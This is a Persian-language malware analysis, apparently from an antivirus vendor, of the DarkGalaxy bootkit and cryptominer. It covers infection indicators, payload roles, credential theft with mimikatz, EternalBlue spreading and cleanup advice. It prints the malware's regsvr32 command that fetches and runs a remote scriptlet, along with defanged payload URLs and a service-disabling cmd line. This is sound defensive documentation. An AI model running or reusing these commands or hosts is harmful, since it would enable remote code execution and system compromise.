شرح کلی
نوع: (BootKit)
اسامی بدافزار:
Rootkit.Win32.DarkGalaxy.a
درجه تخریب: بالا
میزان شیوع: متوسط
آسیبپذیری مورد استفاده: Bruteforce، EternalBlue
روت کیت (Rootkit) چیست؟
روت کیتها بر عملکرد هسته سیستم عامل تاثیر مخرب میگذارند. این تغییرات میتواند باعث مخفی شدن عملکرد اصلی فایلها، پردازهها، سرویسهای داخلی ویندوز و … شود. همچنین بدافزار ممکن است بدون اطلاع کاربر با اتصال به سرور ریموت اقدام به بهروزرسانی فایلهای خود نماید. از فعالیتهای اصلی روت کیتها میتوان به تغییر MBR سیستم و ساخت درایورهای مخرب یا تغییر در نحوه عملکرد درایورهای سالم اشاره نمود.
بدافزار Darkgalaxy چیست؟
این بدافزار که با هدف استخراج ارز دیجیتال وارد سیستم قربانی میشود، با دانلود و بهره گیری از ابزارهای مختلف اقدام به فعالیتهای مخرب بر روی سیستم و شبکه قربانی میکند. از جمله مهمترین فعالیتهای این بدافزار میتوان به دانلود نسخههای جدید و بهروزرسانی فایل اصلی بدافزار، سرقت اطلاعات، استخراج ارز دیجیتال، تغییر DNS و اجرای بات نت Mirai بر روی شبکه قربانی اشاره نمود. این بدافزار علاوه بر کلاینتها بر روی ابزارهای IoT نیز تاثیر میگذارد.
توضیحات فنی
بدافزار Darkgalaxy از جمله بدافزارهای Miner و از دسته BootKitها میباشد که کدهای مخرب خود را در بخش MBR قرار داده و در نتیجه قبل از بوت شدن و بالا آمدن سیستم عامل ابتدا کدهای بدافزار اجرا میشود. و همچنین با ایجاد دو WMIObject سبب دانلود و اجرای یکسری از فایلهای مخرب میشود.
علائم آلودگی
• بالا بودن پردازهی lsmm.exe که جهت انجام عملیات Mining استفاده میشود
• وجود فایلهای job با نام های Mysa1,Mysa2,… در مسیر %Windir%\System32\Tasks.
• وجود دو WMIObject به نامهای ****youmm4 و****youmm3 در مسیرهای root\cimv2 و root\subscription .
• وجود مقدار زیر در مسیرهای run رجیستری :
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\start
Data: regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll
شرح عملکرد فایل اصلی بدافزار:
با بررسی محتوای آبجکت WMI ایحاد شده توسط بدافزار روال اجرا و انتشار آن مشخص شد. بدافزار ابتدا با اتصال به دامینهای مشخص اقدام به دانلود فایلهای اصلی خود میکند.
hxxp://173.247.239.186/ok.exe
hxxp://173.247.239.186/upsupx.exe
hxxp://173.247.239.186/u.exe
این دامینها هر جند وقت یکبار تغییر میکنند.
فایلok.exe یا Max.exe :
مسئول تغییر MBR دیسک سیستم قربانی میباشد.
فایل upsupx.exe :
فایلی با نام xpdown.dat را دانلود میکند. محتوای این فایل درواقع آدرس دانلود فایل bitcoin بدافزار میباشد.
فایل U.exe :
سبب تغییر DNS سیستم به دو مقدار 233.5.5.5 برایpreferred DNS server و 8.8.8.8 برای alternate DNS server میشود.
در ادامه بدافزار اقدام به دانلود لیست زیر میکند که هر کدام مسئول اجرای یکی از اهداف بدافزار هستند.
نام و مسیر ایجاد فایل مخرب | عملکرد |
%Windir%\system\downs.exe | تغییر مجوزهای دسترسی فایلهای موردنظر بدافزار در سیستم |
%Windir%\system\cab.exe | فایل بهروزرسان بدافزار |
%Windir%\inf\msief.exe | اجرا کننده بات نت mirai |
%Windir%\debug\item.dat | سرویس بدافزار |
%Windir%\system\my1.bat | دانلودر فایل up.txt |
بعد از دانلود فایلهای بالا، بدافزار طبق کد wmi خود اقدام به متوقف کردن پردازههای دیگر بدافزارهای Miner موجود در سیستم مثل bitminer,noutrino,… میکند تا به راحتی بتواند اعمال مخرب خود را در سیستم اجرا کند. به این طریق که پردازهی فایلهای svchost.exe ,wininit.exe ,csrss.exe ,WUDFHosts.exe, services.exe,taskhost.exe که در مسیری غیر از مسیر اصلی خود باشد را از طریق wmi حذف میکند.
همچنین علائم آلودگی که توسط نسخههای قبلی ایجاد شده را جهت به روزرسانی خود حذف میکند. این بدافزار سرویس AnyDesk (سرویس نرمافزار ریموت دسکتاپ AnyDesk ) را نیز متوقف میکند.
با توجه به اینکه فایل ماینر بدافزار با نام lsmosee.exe در سیستم قربانی باید ایجاد شود، تمام مسیرها و فایلهای موجود در مسیر %Windir%\debug\lsmosee.exe و %Windir%\help\lsmosee.exe را حذف میکند تا نسخه جدید آنها را جایگزین نسخههای قبلی کند.
Job هایی با نامهای WindowsUpdate1, WindowsUpdate3, Windows_Update, Update, Update2, Update3, windowsinit, System Security Check, AdobeFlashPlayerو… را حذف میکند.
جهت جلوگیری از آلوده سازی سیستم قربانی به دیگر بدافزارها و مختل کردن عمل Mining , دسترسیهای پورتهایی که برای انتقال فایل مورد استفاده قرار میگیرند از جمله پورت 445 و 139 را میبندد, سپس اقدام به تعریف policy جدید با نام win برای ipsec مینماید. به این ترتیب فقط کسانی که خودش بخواهد توانایی برقراری ارتباط با این سیستم را دارند.
با بررسیهای صورت گرفته بر روی فایل، این فیلترها در سیستم عامل XP اعمال نمیشوند. در ادامه SMBDeviceEnabled را از طریق رجیستری Disable میکند.
فایل up.txt :
این فایل از طریق کدهای powershell، اطلاعات سیستم را که شامل local ip، public ip، میزان استفاده از پردازندهها، مسیرفایل و commandline پردازههای در حال اجرا، نوع سیستم عامل و نسخه آن، ظرفیت HardDisk و username،domain و password سیستم که از طریق اجرای ابزار mimikatz بدست آمده در فایلی ذخیره کرده و آن را برای سرورهای بدافزار ارسال میکند.
فایل msief.exe :
• اجراکننده بات نت mirai
• غیرفعال کردن سرویسهای خاص از جمله NlaSvc :
%Windir%\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
• ساخت سرویسی با نام xWinWpdSrv
• استفاده از ابزار masscan برای بررسی پورتهای 445، 80، 8000
• انتشار بدافزار از طریق تکنیک brute foce
بدافزار برای انتشار خود همچنین با استفاده از فایل csrs.exe اقدام به اجرای آسیب پذیری EternalBlue بر روی سایر کلاینتها و ساخت Backdoor بر روی آنها میکند.
روش مقابله و پاکسازی سیستم
آنتی ویروس پادویش این بدافزار را شناسایی کرده و از سیستم حذف میکند. جهت پیشگیری از آلودگی های احتمالی توسط بدافزارهایی که از آسیبپذیری EternalBlue استفاده میکنند، پیشنهاد میشود از وصله امنیتی ارائه شده توسط مایکروسافت ms17-010 استفاده کنید. بخش جلوگیری از نفوذ (IPS) آنتی ویروس پادویش این گونه آسیبپذیریها را شناسایی کرده و از ورود آن به سیستم قربانی جلوگیری می کند.